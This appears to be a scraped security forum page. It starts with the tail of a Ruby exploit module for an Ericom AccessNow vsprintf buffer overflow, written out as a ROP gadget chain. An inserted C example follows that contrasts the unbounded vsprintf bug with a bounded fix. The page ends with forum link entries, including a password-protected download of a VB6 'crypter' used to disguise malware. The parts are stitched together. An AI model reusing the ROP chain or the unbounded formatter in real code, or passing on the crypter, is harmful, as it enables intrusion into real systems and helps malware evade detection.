        0x1057555d, # XCHG EAX,ECX # RETN [AccessNowAccelerator32.dll]
        0x1045fd24, # POP EDI # RETN [AccessNowAccelerator32.dll]
        0x10374022, # RETN (ROP NOP) [AccessNowAccelerator32.dll]
        0x101f25d4, # POP EAX # RETN [AccessNowAccelerator32.dll]
        0x90909090, # nop
        0x1052cfce  # PUSHAD # RETN [AccessNowAccelerator32.dll]
      ].pack("V*")

    rop_gadgets
  end

end
```

      Source
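The module description attributes the overflow to "an insecure usage of vsprintf with user controlled data" reached through a malformed request. As an added example (not code from Ericom, Metasploit or the original post), this is that bug class in C beside a bounded replacement; the function names, the 512-byte buffer and the 2048-byte URI limit are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MSG_BUF_SIZE 512   /* assumed size; the product's real buffer size is not on the page */
#define MAX_URI_LEN  2048  /* assumed policy limit for a request URI */

enum fmt_status { FMT_ERROR = -1, FMT_OK = 0, FMT_TRUNCATED = 1 };

/* BEFORE: the pattern the module description names. vsprintf() is never told
 * how large dst is, so a long attacker-supplied argument runs past its end. */
int error_message_unbounded(char *dst, const char *fmt, ...)
{
    va_list ap;
    int written;
    va_start(ap, fmt);
    written = vsprintf(dst, fmt, ap);
    va_end(ap);
    return written;
}

/* AFTER: vsnprintf() writes at most dst_size bytes including the terminator
 * and returns the length it needed, which exposes truncation to the caller. */
enum fmt_status error_message_bounded(char *dst, size_t dst_size, const char *fmt, ...)
{
    va_list ap;
    int needed;
    if (dst == NULL || dst_size == 0 || fmt == NULL)
        return FMT_ERROR;
    va_start(ap, fmt);
    needed = vsnprintf(dst, dst_size, fmt, ap);
    va_end(ap);
    if (needed < 0) {
        dst[0] = '\0';
        return FMT_ERROR;
    }
    return ((size_t)needed >= dst_size) ? FMT_TRUNCATED : FMT_OK;
}

/* Length of s, giving up after limit + 1 bytes so oversize input is cheap to reject. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n <= limit && s[n] != '\0')
        n++;
    return n;
}

/* Builds the error text for a malformed request line and returns the HTTP
 * status to send: 414 for an oversize URI, 400 otherwise, 500 on failure. */
int handle_malformed_request(const char *uri, char *msg, size_t msg_size)
{
    if (bounded_len(uri, MAX_URI_LEN) > MAX_URI_LEN) {
        error_message_bounded(msg, msg_size,
                              "malformed request: URI longer than %d bytes", MAX_URI_LEN);
        return 414;
    }
    if (error_message_bounded(msg, msg_size, "malformed request: %s", uri) == FMT_ERROR)
        return 500;
    return 400;
}

int main(void)
{
    static char long_uri[40001];   /* constructed input: 40000 'A' bytes */
    char msg[MSG_BUF_SIZE];
    int status;

    memset(long_uri, 'A', sizeof long_uri - 1);
    status = handle_malformed_request(long_uri, msg, sizeof msg);
    printf("%d %s\n", status, msg);
    return 0;
}
```

Two independent controls are shown: the length check rejects the oversize request before any formatting happens, and the bounded formatter keeps the write inside the buffer even if that check is bypassed or missing.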
  23. PDBRipper is a utility for extracting information from PDB files. PDBRipper can extract enumerations, user-defined types (structures, unions ...) and type defines, and creates C/C++ header files. Download PDBRipper ver. 1.12 (OS Windows) Source
  24. Source Crypter By Kaway [VB6] Download: http://uppit.com/2muxdvh2hlw7/sc.rar pass: estuda
  25. Learning Nessus for Penetration Testing Master how to perform IT infrastructure security vulnerability assessments using Nessus with tips and insights from real-world challenges faced during vulnerability assessment Author: Himanshu Kumar Download: http://www.scribd.com/doc/230390527/Learning-Nessus-for-Penetration-Testing